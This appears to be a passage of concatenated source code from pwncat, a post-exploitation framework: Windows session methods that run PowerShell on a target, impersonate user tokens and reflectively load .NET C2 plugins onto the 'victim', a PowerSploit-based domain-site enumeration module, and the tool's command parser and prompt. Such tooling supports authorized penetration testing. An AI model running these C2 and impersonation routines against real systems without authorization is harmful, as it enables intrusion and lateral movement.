            self.powershell("$_ = [System.IO.Path]::GetTempPath() ; $_")[0]
        )
        name = ""

        while True:
            name = f"tmp{pwncat.util.random_string(length=length)}{suffix}"
            try:
                self.new_item(ItemType="File", Path=str(path / name))
                break
            except FileExistsError:
                continue

        return (path / name).open(mode=mode)

    def touch(self, path: str):
        """Touch a file (aka update timestamps and possibly create).

        :param path: path to new or existing file
        :type path: str
        """

        try:
            self.powershell(f'echo $null >> "{path}"')
        except PowershellError as exc:
            if "part of the path" in str(exc).lower():
                raise FileNotFoundError(path)
            raise PermissionError(path)

    def umask(self, mask: Optional[int] = None):
        """Set or retrieve the current umask value"""

        raise NotImplementedError("windows platform does not support umask")

    def unlink(self, path: str):
        """Remove an entry from the file system.

        :param path: path to a file or empty directory
        :type path: str
        """

        # This is a bad solution, but powershell is stupid
        try:
            if self.Path(path).is_dir() and len(self.listdir(path)) != 0:
                raise FileNotFoundError(path)
        except NotADirectoryError:
            pass

        try:
            command = f'Remove-Item -Force -Confirm:$false -Path "{path}"'
            self.powershell(command)
        except PowershellError as exc:
            if "not exist" in str(exc) or "empty" in str(exc):
                raise FileNotFoundError(path)
            raise PermissionError(path)

    def whoami(self) -> str:
        """Retrieve the current user name

        NOTE: This is not cached.
        """

        try:
            result = self.powershell("whoami")[0]
            return result
        except PowershellError as exc:
            raise OSError from exc

    def is_admin(self) -> bool:
        """
        Determine if our current user is an administrator user
        """

        return self._is_admin

    def is_system(self) -> bool:
        """
        Determine if our current user is SYSTEM
        We might not need this, because the users name SHOULD be system...
        but we implement it just in face
        """

        return self._is_system

    def powershell(self, script: Union[str, BinaryIO], depth: int = 1):
        """Execute a powershell script in the context of the C2. The results
        of the command are automatically serialized with ``ConvertTo-Json``.
        You can control the depth of serialization, although with large objects
        this may impose significant performance impacts. The default depth
        is ``1``.

        :param script: a powershell script to execute on the target
        :type script: Union[str, BinaryIO]
        :param depth: the depth of serialization within the returned object, defaults to ``1``
        :type depth: int
        """

        if not isinstance(script, str):
            script = script.read()
        if isinstance(script, bytes):
            script = script.decode("utf-8")

        try:
            result = self.run_method("PowerShell", "run", script, depth)
        except ProtocolError as exc:
            raise PowershellError(exc.message)

        return [json.loads(x) for x in result["output"]]

    def impersonate(self, token: int):
        """Impersonate a user token in the powershell and .net contexts.

        :param token: the user token to impersonate
        :type token: int
        """

        try:
            return self.run_method("Identity", "Impersonate", token)
        except ProtocolError:
            return False

    def revert_to_self(self):
        """Revert any impersonations and return to the original user"""

        return self.impersonate(0)

    def dotnet_load(
        self, name: str, content: Optional[Union[bytes, BytesIO]] = None
    ) -> DotNetPlugin:
        """
        Reflectively load a .Net C2 plugin from the attacker machine. The
        plugin DLL should implement the ``Plugin`` class and method interface.
        The name argument can either be a path to a local DLL or the name of a
        DLL provided by a built-in plugin. Built-in plugins will be automatically
        downloaded if not present in the directory pointed to by the ``plugin_path``
        configuration.

        Plugins are also deduplicated prior to loading on the victim. If a given
        DLL name or a file with a matching hash has already been loaded, the existing
        plugin object is returned, and the DLL is not loaded again.

        The return :class:`DotNetPlugin` class is capable of cleanly translating method
        calls to the methods within the loaded DLL. For example, if ``plugin.dll`` defined
        a method named ``foo``, which took a single string argument, you could call it with:

        .. code-block:: python

            plugin = session.platform.dotnet_load("./plugin.dll")
            result = plugin.foo("Hello World!")

        Plugins can take as parameters and return any JSON-serializable objects.

        :param name: name or path to the DLL to upload
        :type name: str
        :param content: content of the DLL to load or file-like object, if not present on disk
        :type content: Optional[Union[bytes, BytesIO]]
        :rtype: DotNetPlugin
        """

        try:
            plugin = [plugin for plugin in self.plugins if name in plugin.names][0]
            return plugin
        except IndexError:
            pass

        if content is None:
            with Windows.open_plugin(self.manager, name) as filp:
                content = filp.read()

        if not isinstance(content, bytes):
            content = content.read()

        # Calculate the digest
        checksum = hashlib.md5(content).hexdigest()

        # Ensure we haven't loaded the same plugin under another name
        try:
            plugin = [plugin for plugin in self.plugins if plugin.checksum == checksum][
                0
            ]
            plugin.names.append(name)
            return plugin
        except IndexError:
            pass

        # Encode the assembly
        assembly = base64.b64encode(content).decode("utf-8")

        # Load the assembly. Let protocol errors propagate
        ident = self.run_method("Reflection", "load", assembly)

        plugin = DotNetPlugin(self, name, checksum, ident)
        self.plugins.append(plugin)

        return plugin



#!/usr/bin/env python3
from typing import Dict

import pwncat
from pwncat.db import Fact
from pwncat.modules import Status
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class SiteObject(Fact):
    def __init__(self, source: str, data: Dict):
        super().__init__(source=source, types=["domain.site"])

        self.site = data

    def __getitem__(self, name: str):
        """Shortcut for getting properties from the `self.site` property."""

        return self.site[name]

    def title(self, session: "pwncat.manager.Session"):
        return f"[cyan]{self['distinguishedname']}[/cyan]"


class Module(EnumerateModule):
    """Retrieve information on all domain computers"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.site"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Perform enumeration"""

        # Check that we are in a domain
        if not session.run("enumerate", types=["domain.details"]):
            return

        # Ensure we have PowerView loaded
        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            yield Status("requesting domain sites")
            sites = session.platform.powershell("Get-DomainSite")[0]
        except (IndexError, PowershellError):
            # Doesn't appear to be a domain joined site
            return

        if isinstance(sites, dict):
            yield SiteObject(self.name, sites)
        else:
            yield from (SiteObject(self.name, site) for site in sites)



"""
This module implements the command parser, lexer, highlighter, etc for pwncat.
Each command is defined as an individual module under ``pwncat/commands`` which
defines a ``Command`` class that inherits from :class:`pwncat.commands.CommandDefinition`.

Each command is capable of specifying the expected arguments similar to the way
they specified with argparse. Internally, we use the :class:`Parameter` definitions
to build an ``argparse`` parser. We also use them to build a lexer capable of
automatic syntax highlighting at the prompt.

To define a new command, simple create a new module under ``pwncat/commands`` and
define a class named ``Command``.

Example Custom Command
----------------------

.. code-block:: python
    :caption: A Custom Command Placed in ``pwncat/commands``

    class Command(CommandDefinition):
        \""" Command documentation placed in the docstring \"""

        PROG = "custom"
        ARGS = {
            "--option,-o": Parameter(Complete.NONE, help="help info", action="store_true"),
            "positional": Parameter(
                Complete.CHOICES,
                metavar="POSITIONAL",
                choices=["hello", "world"],
                help="help information",
            ),
        }

        def run(self, manager: "pwncat.manager.Manager", args: "argparse.Namespace"):
            manager.log("we ran a custom command!")
"""
import os
import re
import sys
import tty
import fcntl
import shlex
import pkgutil
import termios
import argparse
from io import TextIOWrapper
from enum import Enum, auto
from typing import Dict, List, Type, Callable, Iterable
from functools import partial

import rich.text
from pygments import token
from prompt_toolkit import ANSI, PromptSession
from pygments.lexer import RegexLexer
from pygments.styles import get_style_by_name
from prompt_toolkit.lexers import PygmentsLexer
from prompt_toolkit.styles import Style, merge_styles
from prompt_toolkit.history import History
from prompt_toolkit.document import Document
from prompt_toolkit.completion import (
    Completer,
    Completion,
    CompleteEvent,
    WordCompleter,
    merge_completers,
)
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.patch_stdout import patch_stdout
from prompt_toolkit.styles.pygments import style_from_pygments_cls
from prompt_toolkit.application.current import get_app

import pwncat
import pwncat.db
from pwncat.util import console
from pwncat.channel import ChannelClosed


class Complete(Enum):
    """
    Command argument completion options. This defines how tab completion
    works for an individual command parameter/argument. If you choose to
    use the ``CHOICES`` type, you must specify the argparse ``choices``
    argument to the :class:`Parameter` constructor. This argument can
    either be an iterable or a callable which returns a generator. The
    callable takes as an argument the manager. This allows you to have
    contextual tab completions if needed.
    """

    CHOICES = auto()
    """ Complete argument from the list of choices specified in ``choices`` parameter """
    LOCAL_FILE = auto()
    """ Complete argument as a local file path """
    REMOTE_FILE = auto()
    """ Complete argument as a remote file path """
    NONE = auto()
    """ Do not provide argument completions """


class StoreConstOnce(argparse.Action):
    """Only allow the user to store a value in the destination once. This prevents
    users from selection multiple actions in the privesc parser."""

    def __call__(self, parser, namespace, values, option_string=None):
        if hasattr(self, "__" + self.dest + "_seen"):
            raise argparse.ArgumentError(self, "only one action may be specified")
        setattr(namespace, "__" + self.dest + "_seen", True)
        setattr(namespace, self.dest, self.const)


def StoreForAction(action: List[str]) -> Callable:
    """Generates a custom argparse Action subclass which verifies that the current
    selected "action" option is one of the provided actions in this function. If
    not, an error is raised."""

    class StoreFor(argparse.Action):
        """Store the value if the currently selected action matches the list of
        actions passed to this function."""

        def __call__(self, parser, namespace, values, option_string=None):
            if getattr(namespace, "action", None) not in action:
                raise argparse.ArgumentError(
                    self,
                    f"{option_string}: only valid for {action}",
                )

            setattr(namespace, self.dest, values)

    return StoreFor


def StoreConstForAction(action: List[str]) -> Callable:
    """Generates a custom argparse Action subclass which verifies that the current
    selected "action" option is one of the provided actions in this function. If
    not, an error is raised. This stores the constant `const` to the `dest` argument.
    This is comparable to `store_const`, but checks that you have selected one of
    the specified actions."""

    class StoreFor(argparse.Action):
        """Store the value if the currently selected action matches the list of
        actions passed to this function."""

        def __call__(self, parser, namespace, values, option_string=None):
            if getattr(namespace, "action", None) not in action:
                raise argparse.ArgumentError(
                    self,
                    f"{option_string}: only valid for {action}",
                )

            setattr(namespace, self.dest, self.const)

    return StoreFor


def get_module_choices(command):
    """Yields a list of module choices to be used with command argument
    choices to select a valid module for the current target. For example
    you could use ``Parameter(Complete.CHOICES, choices=get_module_choices)``"""

    if command.manager.target is None:
        return

    yield from [
        module.name.removeprefix("agnostic.").removeprefix(
            command.manager.target.platform.name + "."
        )
        for module in command.manager.target.find_module("*")
    ]


class Parameter:
    """Generic parameter definition for commands.

    This class allows you to specify the syntax highlighting, tab completion
    and argparse settings for a command parameter in on go. The ``complete``
    argument tells pwncat how to tab complete your argument. The ``token``
    argument is normally omitted but can be used to change the pygments
    syntax highlighting for your argument. All other arguments are passed
    directly to ``argparse`` when constructing the parser.

    :param complete: the completion type
    :type complete: Complete
    :param token: the Pygments token to highlight this argument with
    :type token: Pygments Token
    :param group: true for a group definition, a string naming the group to be a part of, or none
    :param mutex: for group definitions, indicates whether this is a mutually exclusive group
    :param args: positional arguments for ``add_argument`` or ``add_argument_group``
    :param kwargs: keyword arguments for ``add_argument`` or ``add_argument_group``
    """

    def __init__(
        self,
        complete: Complete,
        token=token.Name.Label,
        group: str = None,
        *args,
        **kwargs,
    ):
        self.complete = complete
        self.token = token
        self.group = group
        self.args = args
        self.kwargs = kwargs


class Group:
    """
    This just wraps the parameters to the add_argument_group and add_mutually_exclusive_group
    """

    def __init__(self, mutex: bool = False, **kwargs):
        self.mutex = mutex
        self.kwargs = kwargs


class CommandDefinition:
    """
    Generic structure for a local command.

    The docstring for your command class becomes the long-form help for your command.
    See the above example for a complete custom command definition.

    :param manager: the controlling manager for this command
    :type manager: pwncat.manager.Manager
    """

    PROG = "unimplemented"
    """ The name of your new command """
    ARGS: Dict[str, Parameter] = {}
    """ A dictionary of parameter definitions created with the ``Parameter`` class.
    If this is None, your command will receive the raw argument string and no processing
    will be done except removing the leading command name.
    """
    GROUPS: Dict[str, Group] = {}
    """ A dictionary mapping group definitions to group names. The parameters to Group
    are passed directly to either add_argument_group or add_mutually_exclusive_group
    with the exception of the mutex arg, which determines the group type. """
    DEFAULTS = {}
    """ A dictionary of default values (passed directly to ``ArgumentParser.set_defaults``) """
    LOCAL = False
    """ Whether this command is purely local or requires an connected remote host """

    # An example definition of arguments
    # PROG = "command"
    # ARGS = {
    #     "--all,-a": parameter(
    #         Complete.NONE, action="store_true", help="A switch/option"
    #     ),
    #     "--file,-f": parameter(Complete.LOCAL_FILE, help="A local file"),
    #     "--rfile": parameter(Complete.REMOTE_FILE, help="A remote file"),
    #     "positional": parameter(
    #         Complete.CHOICES, choices=["a", "b", "c"], help="Choose one!"
    #     ),
    # }

    def __init__(self, manager: "pwncat.manager.Manager"):
        """Initialize a new command instance. Parse the local arguments array
        into an argparse object."""

        self.manager = manager

        # Create the parser object
        if self.ARGS is not None:
            self.parser = argparse.ArgumentParser(
                prog=self.PROG,
                description=self.__doc__,
                formatter_class=argparse.RawDescriptionHelpFormatter,
            )
            self.build_parser(self.parser, self.ARGS, self.GROUPS)
        else:
            self.parser = None

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        This is the "main" for your new command. This should perform the action
        represented by your command.

        :param manager: the manager to operate on
        :type manager: pwncat.manager.Manager
        :param args: the argparse Namespace containing your parsed arguments
        """
        raise NotImplementedError

    def build_parser(
        self,
        parser: argparse.ArgumentParser,
        args: Dict[str, Parameter],
        group_defs: Dict[str, Group],
    ):
        """
        Parse the ARGS and DEFAULTS dictionaries to build an argparse ArgumentParser
        for this command. You should not need to overload this.

        :param parser: the parser object to add arguments to
        :param args: the ARGS dictionary
        """

        groups = {}
        for name, definition in group_defs.items():
            if definition.mutex:
                groups[name] = parser.add_mutually_exclusive_group(**definition.kwargs)
            else:
                groups[name] = parser.add_argument_group(**definition.kwargs)

        for arg, param in args.items():
            names = arg.split(",")

            if param.group is not None and param.group not in groups:
                raise ValueError(f"{param.group}: no such group")

            if param.group is not None:
                group = groups[param.group]
            else:
                group = parser

            # Patch choice to work with a callable
            if "choices" in param.kwargs and callable(param.kwargs["choices"]):
                method = param.kwargs["choices"]

                class wrapper:
                    def __init__(wself, method):
                        wself.method = method

                    def __iter__(wself):
                        yield from wself.method(self)

                param.kwargs["choices"] = wrapper(method)

            # Patch "type" so we can see "self"
            if (
                "type" in param.kwargs
                and isinstance(param.kwargs["type"], tuple)
                and param.kwargs["type"][0] == "method"
            ):
                param.kwargs["type"] = partial(param.kwargs["type"][1], self)

            group.add_argument(*names, *param.args, **param.kwargs)

        parser.set_defaults(**self.DEFAULTS)


def resolve_blocks(source: str):
    """This is a dumb lexer that turns strings of text with code blocks (squigly
    braces) into a single long string separated by semicolons. All code blocks are
    converted to strings recursively with correct escaping levels. The resulting
    string can be sent to break_commands to iterate over the commands."""

    result = []
    in_brace = False
    inside_quotes = False
    i = 0
    lineno = 1

    while i < len(source):
        if not inside_quotes:
            if source[i] == '"':
                inside_quotes = True
                result.append("\\" * int(in_brace) + '"')
            elif source[i] == "{" and not in_brace:
                result.append('"')
                in_brace = True
            elif source[i] == "}":
                if not in_brace:
                    raise ValueError(f"line {lineno}: mismatched closing brace")
                in_brace = False
                result.append('"')
            elif source[i] == "\\":
                result.append("\\" * (int(in_brace)))
            elif source[i] == "\n" and in_brace:
                result.append("\\n")
            elif source[i] == "#":
                # Comment
                while i < len(source) and source[i] != "\n":
                    i += 1
            else:
                result.append(source[i])
        else:
            if source[i] == '"':
                inside_quotes = False
                result.append("\\" * int(in_brace) + '"')
            elif source[i] == "\\":
                result.append("\\" * (in_brace + 1))
            elif source[i] == "\n":
                raise ValueError(f"line {lineno}: newlines cannot appear in strings")
            else:
                result.append(source[i])
        if source[i] == "\n":
            lineno += 1
        i += 1

    if in_brace:
        raise ValueError("mismatched braces")
    if inside_quotes:
        raise ValueError("missing ending quote")

    return "".join(result).split("\n")


class DatabaseHistory(History):
    """Yield history from the host entry in the database"""

    def __init__(self, manager):
        super().__init__()
        self.manager = manager

    def load_history_strings(self) -> Iterable[str]:
        """Load the history from the database"""

        with self.manager.db.transaction() as conn:
            yield from reversed(conn.root.history)

    def store_string(self, string: str) -> None:
        """Store a command in the database"""

        with self.manager.db.transaction() as conn:
            conn.root.history.append(string)


class CommandParser:
    """Handles dynamically loading command classes, parsing input, and
    dispatching commands. This class effectively has complete control over
    the terminal whenever in an interactive pwncat session. It will change
    termios modes for the control tty at will in order to support raw vs
    command mode."""

    def __init__(self, manager: "pwncat.manager.Manager"):
        """We need to dynamically load commands from pwncat.commands"""

        self.manager = manager
        self.commands: List["CommandDefinition"] = []

        for loader, module_name, is_pkg in pkgutil.walk_packages(__path__):
            if module_name == "base":
                continue
            self.commands.append(
                loader.find_module(module_name)
                .load_module(module_name)
                .Command(manager)
            )

        self.prompt: PromptSession = None
        self.toolbar: PromptSession = None
        self.loading_complete = False
        self.aliases: Dict[str, CommandDefinition] = {}
        self.shortcuts: Dict[str, CommandDefinition] = {}
        self.found_prefix: bool = False
        # Saved terminal state to support switching between raw and normal
        # mode.
        self.saved_term_state = None

    def setup_prompt(self):
        """This needs to happen after __init__ when the database is fully
        initialized."""

        history = DatabaseHistory(self.manager)
        completer = CommandCompleter(self.manager, self.commands)
        lexer = PygmentsLexer(CommandLexer.build(self.commands))
        style = style_from_pygments_cls(get_style_by_name("monokai"))
        auto_suggest = AutoSuggestFromHistory()
        bindings = KeyBindings()

        @bindings.add("c-q")
        def _(event):
            """Exit interactive mode"""

            get_app().exit(exception=pwncat.manager.InteractiveExit())

        self.prompt = PromptSession(
            [
                ("fg:ansiyellow bold", "(local) "),
                ("fg:ansimagenta bold", "pwncat"),
                ("", "$ "),
            ],
            completer=completer,
            lexer=lexer,
            style=merge_styles(
                [style, Style.from_dict({"bottom-toolbar": "#333333 bg:#ffffff"})]
            ),
            auto_suggest=auto_suggest,
            complete_while_typing=False,
            history=history,
            bottom_toolbar=self._render_toolbar,
            key_bindings=bindings,
        )

    def _render_toolbar(self):
        """Render the formatted text for the bottom toolbar"""

        if self.manager.target is None:
            markup_result = "Active Session: [red]None[/red]"
        else:
            markup_result = f"Active Session: {self.manager.target.platform}"

        # Convert rich-style markup to prompt_toolkit formatted text
        text = rich.text.Text.from_markup(markup_result)
        segments = list(text.render(console))
        rendered = []

        # Here we take each segment's stile, invert the color and render the
        # segment text. This is because the bottom toolbar has it's colors
        # inverted.
        for i in range(len(segments)):
            style = segments[i].style.copy()
            temp = style.color
            style._color = segments[i].style.bgcolor
            style._bgcolor = temp
            rendered.append(style.render(segments[i].text))

        # Join the rendered segments to ANSI escape sequences.
        # This format can be parsed by prompt_toolkit formatted text.
        ansi_result = "".join(rendered)

        # Produce prompt_toolkit formatted text from the ANSI escaped string
        return ANSI(ansi_result)

    def eval(self, source: str, name: str = "<script>"):
        """Evaluate the given source file. This will execute the given string
        as a script of commands. Syntax is the same except that commands may
        be separated by semicolons, comments are accepted as following a "#" and
        multiline strings are supported with '"{' and '}"' as delimeters."""

        for command in resolve_blocks(source):
            try:
                self.dispatch_line(command)
            except ChannelClosed as exc:
                # A channel was unexpectedly closed
                self.manager.log(
                    f"[yellow]warning[/yellow]: {exc.channel}: channel closed"
                )
                # Ensure any existing sessions are cleaned from the manager
                exc.cleanup(self.manager)
            except pwncat.manager.InteractiveExit:
                # Within a script, `exit` means to exit the script, not the
                # interpreter
                break
            except Exception as exc:
                console.log(
                    f"[red]error[/red]: [cyan]{name}[/cyan]: [yellow]{command}[/yellow]: {str(exc)}"
                )
                break

    def run_single(self):
        """Execute one Read-Execute iteration. This will prompt the user for input."""

        if self.prompt is None:
            self.setup_prompt()

        try:
            line = self.prompt.prompt().strip()
            self.dispatch_line(line)
        except (EOFError, OSError, KeyboardInterrupt, pwncat.manager.InteractiveExit):
            return

    def run(self):
        """Execute the pwncat REPL. This will continue running until an :class:`InteractiveExit`
        exception or a :class:`EOFError` exception are raised."""

        if self.prompt is None:
            self.setup_prompt()

        running = True
        default_text = ""

        while running:
            try:

                if self.manager.config.module:
                    self.prompt.message = [
                        (
                            "fg:ansiyellow bold",
                            f"({self.manager.config.module.name}) ",
                        ),
                        ("fg:ansimagenta bold", "pwncat"),
                        ("", "$ "),
                    ]
                else:
                    self.prompt.message = [
                        ("fg:ansiyellow bold", "(local) "),
                        ("fg:ansimagenta bold", "pwncat"),
                        ("", "$ "),
                    ]

                with patch_stdout(raw=True):
                    line = self.prompt.prompt(default=default_text).strip()

                default_text = ""

                if line == "":
                    continue

                self.dispatch_line(line)
            # We used to catch only KeyboardException, but this prevents a
            # badly written command from completely killing our remote
            # connection.
            except EOFError:
                # C-d was pressed. Assume we want to exit the prompt.
                running = False
            except KeyboardInterrupt:
                # Normal C-c from a shell just clears the current prompt
                continue
            except ChannelClosed as exc:
                # A channel was unexpectedly closed
                self.manager.log(
                    f"[yellow]warning[/yellow]: {exc.channel}: channel closed"
                )
                # Ensure any existing sessions are cleaned from the manager
                exc.cleanup(self.manager)
            except pwncat.manager.InteractiveExit:
                # We don't want this caught below, so we catch it here
                # then re-raise it to be caught by the interactive method
                raise
            except (Exception, KeyboardInterrupt):
                console.print_exception(width=None)
                continue

    def dispatch_line(self, line: str, prog_name: str = None):
        """Parse the given line of command input and dispatch a command"""

        # Account for blank or whitespace only lines
        line = line.strip()
        if line == "":
            return

        try:
            # Spit the line with shell rules
            argv = shlex.split(line)
        except ValueError as e:
            self.manager.log(f"[red]error[/red]: {e.args[0]}")
            return

        if argv[0][0] in self.shortcuts:
            command = self.shortcuts[argv[0][0]]
            argv[0] = argv[0][1:]
            args = argv
            line = line[1:]
        else:
            line = f"{argv[0]} ".join(line.split(f"{argv[0]} ")[1:])
            # Search for a matching command
            for command in self.commands:
                if command.PROG == argv[0]:
                    break
            else:
                if argv[0] in self.aliases:
                    command = self.aliases[argv[0]]
                else:
                    self.manager.log(f"[red]error[/red]: {argv[0]}: unknown command")
                    return

            if self.manager.target is None and not command.LOCAL:
                self.manager.log(
                    f"[red]error[/red]: {argv[0]}: active session required"
                )
                return

            args = argv[1:]

        args = [a.encode("utf-8").decode("unicode_escape") for a in args]

        try:
            if prog_name:
                temp_name = command.parser.prog
                command.parser.prog = prog_name
                prog_name = temp_name

            # Parse the arguments
            if command.parser:
                args = command.parser.parse_args(args)
            else:
                args = line

            # Run the command
            command.run(self.manager, args)

            if prog_name:
                command.parser.prog = prog_name

        except SystemExit:
            # The arguments were incorrect
            return

    def parse_prefix(self, channel, data: bytes):
        """Parse data received from the user when in pwncat's raw mode.
        This will intercept key presses from the user and interpret the
        prefix and any bound keyboard shortcuts. It also sends any data
        without a prefix to the remote channel.

        :param data: input data from user
        :type data: bytes
        """

        buffer = b""

        for c in data:
            if not self.found_prefix and c != pwncat.config["prefix"].value:
                buffer += c
                continue
            elif not self.found_prefix and c == pwncat.config["prefix"].value:
                self.found_prefix = True
                channel.send(buffer)
                buffer = b""
                continue
            elif self.found_prefix:
                try:
                    binding = pwncat.config.binding(c)
                    if binding.strip() == "pass":
                        buffer += c
                    else:
                        # Restore the normal terminal
                        self.restore_term()

                        # Run the binding script
                        self.eval(binding, "<binding>")

                        # Drain any channel output
                        channel.drain()
                        channel.send(b"\n")

                        # Go back to a raw terminal
                        self.raw_mode()
                except KeyError:
                    pass
                self.found_prefix = False

        # Flush any remaining raw data bound for the victim
        channel.send(buffer)

    def raw_mode(self):
        """Save the current terminal state and enter raw mode.
        If the terminal is already in raw mode, this function
        does nothing."""

        if self.saved_term_state is not None:
            return

        # Ensure we don't have any weird buffering issues
        sys.stdout.flush()

        # Python doesn't provide a way to use setvbuf, so we reopen stdout
        # and specify no buffering. Duplicating stdin allows the user to press C-d
        # at the local prompt, and still be able to return to the remote prompt.
        try:
            os.dup2(sys.stdin.fileno(), sys.stdout.fileno())
        except OSError:
            pass
        sys.stdout = TextIOWrapper(
            os.fdopen(os.dup(sys.stdin.fileno()), "bw", buffering=0),
            write_through=True,
            line_buffering=False,
        )

        # Grab and duplicate current attributes
        fild = sys.stdin.fileno()
        old = termios.tcgetattr(fild)
        new = termios.tcgetattr(fild)

        # Remove ECHO from lflag and ensure we won't block
        new[3] &= ~(termios.ECHO | termios.ICANON)
        new[6][termios.VMIN] = 0
        new[6][termios.VTIME] = 0
        termios.tcsetattr(fild, termios.TCSADRAIN, new)

        # Set raw mode
        tty.setraw(sys.stdin)

        orig_fl = fcntl.fcntl(sys.stdin, fcntl.F_GETFL)
        fcntl.fcntl(sys.stdin, fcntl.F_SETFL, orig_fl)

        self.saved_term_state = old, orig_fl

    def restore_term(self, new_line=True):
        """Restores the normal terminal settings. This does nothing if the
        terminal is not currently in raw mode."""

        if self.saved_term_state is None:
            return

        termios.tcsetattr(
            sys.stdin.fileno(), termios.TCSADRAIN, self.saved_term_state[0]
        )
        # tty.setcbreak(sys.stdin)
        fcntl.fcntl(sys.stdin, fcntl.F_SETFL, self.saved_term_state[1])

        if new_line:
            sys.stdout.write("\n")

        self.saved_term_state = None


class CommandLexer(RegexLexer):
    """Implements a Regular Expression based pygments lexer for dynamically highlighting
    the pwncat prompt during typing. The tokens are generated from command definitions."""

    tokens = {}

    @classmethod
    def build(cls, commands: List["CommandDefinition"]) -> Type["CommandLexer"]:
        """Build the RegexLexer token list from the command definitions"""

        root = []
        sorted_commands = sorted(commands, key=lambda cmd: len(cmd.PROG), reverse=True)
        for command in sorted_commands:
            root.append(
                (
                    "^" + re.escape(command.PROG) + "( |$)",
                    token.Name.Function,
                    command.PROG,
                )
            )
            mode = []
            if command.ARGS is not None:
                for args, param in command.ARGS.items():
                    for arg in args.split(","):
                        if not arg.startswith("-"):
                            continue
                        if param.complete != Complete.NONE:
                            # Enter param state
                            mode.append((r"\s+" + re.escape(arg), param.token, "param"))
                        else:
                            # Don't enter param state
                            mode.append((r"\s+" + re.escape(arg), param.token))
                mode.append((r"\s+(\-\-help|\-h)", token.Name.Label))
            mode.append((r"\"", token.String, "string"))
            mode.append((r".", token.Text))
            cls.tokens[command.PROG] = mode

        root.append((r".", token.Text))
        cls.tokens["root"] = root
        cls.tokens["param"] = [
            (r"\"", token.String, "string"),
            (r"\s", token.Text, "#pop"),
            (r"[^\s]", token.Text),
        ]
        cls.tokens["string"] = [
            (r"[^\"\\]+", token.String),
            (r"\\.", token.String.Escape),
            ('"', token.String, "#pop"),
        ]

        return cls


class RemotePathCompleter(Completer):
    """Complete remote file names/paths"""

    def __init__(self, manager: "pwncat.manager.Manager", *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.manager = manager

    def get_completions(self, document: Document, complete_event: CompleteEvent):

        if self.manager.target is None:
            return

        before = document.text_before_cursor.split()[-1]
        path, partial_name = os.path.split(before)

        if path == "":
            path = "."

        for name in self.manager.target.platform.listdir(path):
            if name.startswith(partial_name):
                yield Completion(
                    name,
                    start_position=-len(partial_name),
                    display=[("#ff0000", "(remote)"), ("", f" {name}")],
                )


class LocalPathCompleter(Completer):
    """Complete local file names/paths."""

    def get_completions(self, document: Document, complete_event: CompleteEvent):

        before = document.text_before_cursor.split()[-1]
        path, partial_name = os.path.split(before)

        if path == "":
            path = "."

        # Ensure the directory exists
        if not os.path.isdir(path):
            return

        for name in os.listdir(path):
            if name.startswith(partial_name):
                yield Completion(
                    name,
                    start_position=-len(partial_name),
                    display=[("fg:ansiyellow", "(local)"), ("", f" {name}")],
                )


class CommandCompleter(Completer):
    """Tab-complete commands and all of their arguments dynamically using the
    command definitions and their associated argument definitions."""

    def __init__(
        self, manager: "pwncat.manager.Manager", commands: List["CommandDefinition"]
    ):
        """Construct a new command completer"""

        self.layers = {}
        local_file_completer = LocalPathCompleter()
        remote_file_completer = RemotePathCompleter(manager)

        for command in commands:
            self.layers[command.PROG] = [None, [], {}]
            option_names = []
            if command.ARGS is not None:
                for name_list, param in command.ARGS.items():
                    name_list = name_list.split(",")
                    if param.complete == Complete.CHOICES:
                        completer = ("choices", param.kwargs["choices"])
                    elif param.complete == Complete.LOCAL_FILE:
                        completer = local_file_completer
                    elif param.complete == Complete.REMOTE_FILE:
                        completer = remote_file_completer
                    elif param.complete == Complete.NONE:
                        completer = None
                    if len(name_list) == 1 and not name_list[0].startswith("-"):
                        self.layers[command.PROG][1].append(completer)
                    else:
                        for name in name_list:
                            self.layers[command.PROG][2][name] = completer
                            option_names.append(name)
                self.layers[command.PROG][0] = WordCompleter(
                    option_names + ["--help", "-h"]
                )

        self.completer = WordCompleter(list(self.layers))

    def get_completions(
        self, document: Document, complete_event: CompleteEvent
    ) -> Iterable[Completion]:
        """Get a list of completions for the given document"""

        text = document.text_before_cursor.lstrip()
        try:
            args = shlex.split(text)
        except ValueError:
            try:
                args = shlex.split(text + '"')
            except ValueError:
                args = shlex.split(text + "'")

        # We haven't finished typing the command. Use our word completer for
        # commands
        if text == "" or (len(args) == 1 and not text.endswith(" ")):
            yield from self.completer.get_completions(document, complete_event)
            return

        # Not in a known command, can't autocomplete
        if args[0] not in self.layers:
            return

        command = self.layers[args[0]]
        args = args[1:]
        next_completer = command[0]
        this_completer = command[0]
        positional = 0
        # state = "options", completing options next
        # state = "arguments", completing arguments to options next
        state = "options"

        for arg in args:
            if state == "options":
                # Flag options
                if arg.startswith("-"):
                    # Exact match, with a sub-completer
                    if arg in command[2] and command[2][arg] is not None:
                        # Completer for next argument
                        next_completer = command[2][arg]
                        state = "arguments"
                    # Exact match, with no arguments
                    elif arg in command[2]:
                        # Command has no argument, next completer is options
                        # completer
                        next_completer = command[0]
                        state = "options"
                        this_completer = command[0]
                    # Non-exact match
                    else:
                        next_completer = command[0]
                        this_completer = command[0]
                        state = "options"
                # Appears to be a positional argument, grab next positional
                # completer and increment positional count
                else:
                    if positional < len(command[1]):
                        this_completer = command[1][positional]
                        next_completer = command[0]
                        state = "options"
                        positional += 1
                    else:
                        this_completer = command[0]
                        next_completer = command[0]
                        state = "options"
            else:
                # Completing an argument to a option/switch. We can't verify
                # it's legitimacy, so we assume it's right, and reset to a
                # default state.
                state = "options"
                this_completer = next_completer
                next_completer = command[0]

        # We are completing the first argument. This could be
        # any option argument or the first positional argument.
        # We need to merge them.
        if not args and text.endswith(" ") and command[1]:
            completer = command[1][0]
            if isinstance(completer, tuple) and completer[0] == "choices":
                completer = WordCompleter(completer[1], WORD=True)
            next_completer = merge_completers([next_completer, completer])

        if isinstance(this_completer, tuple) and this_completer[0] == "choices":
            this_completer = WordCompleter(this_completer[1], WORD=True)
        if isinstance(next_completer, tuple) and next_completer[0] == "choices":
            next_completer = WordCompleter(next_completer[1], WORD=True)

        if text.endswith(" ") and next_completer is not None:
            yield from next_completer.get_completions(document, complete_event)
